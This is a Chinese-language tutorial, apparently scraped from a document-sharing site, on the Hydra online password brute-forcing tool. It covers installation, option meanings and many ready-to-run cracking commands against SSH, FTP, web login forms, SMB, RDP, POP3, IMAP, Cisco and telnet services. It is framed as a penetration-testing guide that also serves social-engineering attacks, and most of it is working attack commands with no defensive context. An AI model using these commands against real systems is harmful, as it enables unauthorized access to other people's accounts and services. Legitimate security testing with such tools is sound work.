文档库 最新最全的文档下载
当前位置:文档库 › 密码破解渗透工具—Hydra

密码破解渗透工具—Hydra

密码破解渗透工具——Hydra

这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。

简介

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。官网:https://www.wendangku.net/doc/9f2873952.html,/thc-hydra,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, ftp, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-head, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, mysql, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, rexec,rlogin, rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, ssh (v1 and v2), Subversion, Teamspeak (TS2), telnet, VMware-Auth, VNC and XMPP等类型密码。

安装

如果是Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装:sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra Redhat/Fedora发行版的下载源码包编译安装,先安装相关依赖包:

yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel

hydra下载地址:https://www.wendangku.net/doc/9f2873952.html,/releases/hydra-7.3.tar.gz

# tar zxvf hydra-7.0-src.tar.gz

# cd hydra-7.0-src

# ./configure

# make

# make install

hydra支持GUI图形界面,不过习惯还是命令好用。

参数说明

搜hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-wtime] [-f] [-s PORT] [-S] [-vV] server

service [OPT]

-R 继续从上一次进度接着破解。

-S 采用SSL链接。

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户,对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写,指定密码破解,少用,一般是采用密码字典。

-P FILE 大写,指定密码字典。

-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。

-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数,默认为16。

-w TIME 设置最大超时的时间,单位秒,默认是30s。

-v / -V 显示详细过程。

server 目标ip

service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

实例

手动创建用户名字典和密码字典

在这里只是为了演示,只加了几个用户名和弱口令。真正破解时,需要利用密码字典生成器生成强大的字典。

破解ssh:

# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh

破解成功,直接显示结果。

也可以使用-o 选项指定结果输出文件。

# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

其他类型密码破解

?在破解ftp:

# hydra ip ftp -l 用户名-P 密码字典-t 线程(默认16) -vV

# hydra ip ftp -l 用户名-P 密码字典-e ns -vV

?get方式提交,破解web登录:

# hydra -l 用户名-p 密码字典-t 线程-vV -e ns ip http-get /admin/

# hydra -l 用户名-p 密码字典-t 线程-vV -e ns -f ip http-get /admin/index.php

?post方式提交,破解web登录:

该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:





假设有以上一个密码登录表单,我们执行命令:

# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:invalido

说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

后面参数是网页中对应的表单字段的name 属性,后面中的内容是表示错误猜解的返回信息提示,可以自定义。</p><p>?破解https:</p><p># hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https</p><p>?破解teamspeak:</p><p># hydra -l 用户名-P 密码字典-s 端口号-vV ip teamspeak</p><p>?破解cisco:</p><p># hydra -P pass.txt 10.36.16.18 cisco</p><p># hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable</p><p>?破解smb:</p><p># hydra -l administrator -P pass.txt 10.36.16.18 smb</p><p>?破解pop3:</p><p># hydra -l muts -P pass.txt my.pop3.mail pop3</p><p>?破解rdp:</p><p># hydra ip rdp -l administrator -P pass.txt -V</p><p>?破解http-proxy:</p><p># hydra -l admin -P pass.txt http-proxy://10.36.16.18</p><p>?破解imap:</p><p># hydra -L user.txt -p secret 10.36.16.18 imap PLAIN</p><p># hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</p><p>?破解telnet</p><p># hydra ip telnet -l 用户-P 密码字典-t 32 -s 23 -e ns -f -V</p><!--/p4--><!--p5--><p>总结</p><p>此工具强大之处远多于以上测试,其密码能否破解关键在于强大的字典,对于社工型渗透来说,有时能够得到事半功倍的效果。</p><!--/p5--></div> <div class="pagiv"> </div> </div> <div> <div>相关文档</div> <div class="relatedtopic"> <div id="tabs-section" class="tabs"> <ul class="tab-head"> <li id="10560253"><a href="/topic/10560253/" target="_blank">密码破解工具大全</a></li> <li id="3757046"><a href="/topic/3757046/" target="_blank">密码破解工具</a></li> <li id="19358800"><a href="/topic/19358800/" target="_blank">超全的解密工具</a></li> <li id="6480369"><a href="/topic/6480369/" target="_blank">windows破解密码</a></li> <li id="10396219"><a href="/topic/10396219/" target="_blank">windows口令破解</a></li> <li id="5714871"><a href="/topic/5714871/" target="_blank">远程登录用户密码破解</a></li> </ul> </div> </div> </div> </div> <div class="category"> <span class="navname">相关文档</span> <ul class="lista"> <li><a href="/doc/3d11323455.html" target="_blank">八个快速破解密码的软件和使用方法</a></li> <li><a href="/doc/5115780524.html" target="_blank">wifi密码破解工具</a></li> <li><a href="/doc/818999746.html" target="_blank">无线网络密码破解方法大全(附破解软件下载)</a></li> <li><a href="/doc/c02289214.html" target="_blank">黑客基础-十种黑客常用密码破解方法</a></li> <li><a href="/doc/251378792.html" target="_blank">暴力破解密码</a></li> <li><a href="/doc/f917068921.html" target="_blank">Excel密码破解</a></li> <li><a href="/doc/4a17832844.html" target="_blank">密码破解工具</a></li> <li><a href="/doc/6612216856.html" target="_blank">没密码不用急,102种超全的解密工具任你选!值得珍藏 - Discuz!-模板风格 - D...</a></li> <li><a href="/doc/9f2873952.html" target="_blank">密码破解渗透工具—Hydra</a></li> <li><a href="/doc/ff8459280.html" target="_blank">EXCEL密码破解无需任何工具插件超简单</a></li> <li><a href="/doc/3c2003143.html" target="_blank">excel2003文件密码破解图文教程 excel2003密码破解软件下载</a></li> <li><a href="/doc/5914925654.html" target="_blank">30秒破解所有密码(大全)</a></li> <li><a href="/doc/7f6857590.html" target="_blank">推荐常用密码的破解完全手册</a></li> <li><a href="/doc/b514888834.html" target="_blank">30秒破解电脑所有密码如word,rar等</a></li> <li><a href="/doc/f414272832.html" target="_blank">八个快速破解密码的软件及使用方法</a></li> <li><a href="/doc/4615521709.html" target="_blank">30秒破解所有密码</a></li> <li><a href="/doc/6e7322562.html" target="_blank">无线网络密码破解方法大全(附破解软件下载)</a></li> <li><a href="/doc/9b1333280.html" target="_blank">各密码破解平台软件对比</a></li> <li><a href="/doc/dc17074424.html" target="_blank">密码破解的主要分类与讲解</a></li> <li><a href="/doc/351227332.html" target="_blank">密码破解工具大全(200种)</a></li> </ul> <span class="navname">最新文档</span> <ul class="lista"> <li><a href="/doc/0719509601.html" target="_blank">幼儿园小班科学《小动物过冬》PPT课件教案</a></li> <li><a href="/doc/0e19509602.html" target="_blank">2021年春新青岛版(五四制)科学四年级下册 20.《露和霜》教学课件</a></li> <li><a href="/doc/9319184372.html" target="_blank">自然教育课件</a></li> <li><a href="/doc/3019258759.html" target="_blank">小学语文优质课火烧云教材分析及课件</a></li> <li><a href="/doc/db19211938.html" target="_blank">(超详)高中语文知识点归纳汇总</a></li> <li><a href="/doc/af19240639.html" target="_blank">高中语文基础知识点总结(5篇)</a></li> <li><a href="/doc/9919184371.html" target="_blank">高中语文基础知识点总结(最新)</a></li> <li><a href="/doc/8b19195909.html" target="_blank">高中语文知识点整理总结</a></li> <li><a href="/doc/8019195910.html" target="_blank">高中语文知识点归纳</a></li> <li><a href="/doc/7f19336998.html" target="_blank">高中语文基础知识点总结大全</a></li> <li><a href="/doc/7a19336999.html" target="_blank">超详细的高中语文知识点归纳</a></li> <li><a href="/doc/6719035160.html" target="_blank">高考语文知识点总结高中</a></li> <li><a href="/doc/6a19035161.html" target="_blank">高中语文知识点总结归纳</a></li> <li><a href="/doc/4d19232289.html" target="_blank">高中语文知识点整理总结</a></li> <li><a href="/doc/3a19258758.html" target="_blank">高中语文知识点归纳</a></li> <li><a href="/doc/2519396978.html" target="_blank">高中语文知识点归纳(大全)</a></li> <li><a href="/doc/2419396979.html" target="_blank">高中语文知识点总结归纳(汇总8篇)</a></li> <li><a href="/doc/1f19338136.html" target="_blank">高中语文基础知识点整理</a></li> <li><a href="/doc/ef19066069.html" target="_blank">化工厂应急预案</a></li> <li><a href="/doc/bc19159069.html" target="_blank">化工消防应急预案(精选8篇)</a></li> </ul> </div> </div> <script> var sdocid = "9260bfacf242336c1fb95e2d"; </script> <div class="footer"> <p><a href="/tousu.html" target="_blank">侵权投诉</a>  © 2013-2023 www.wendangku.net  <a href="/sitemap.html">站点地图</a> | <a href="https://m.wendangku.net">手机版</a></p> <p><a href="https://beian.miit.gov.cn" target="_blank">闽ICP备11023808号-7</a>  本站文档均来自互联网及网友上传分享,本站只负责收集和整理,有任何问题可通过上访投诉通道进行反馈</p> </div> <script type="text/javascript">foot();</script> </div> </body> </html>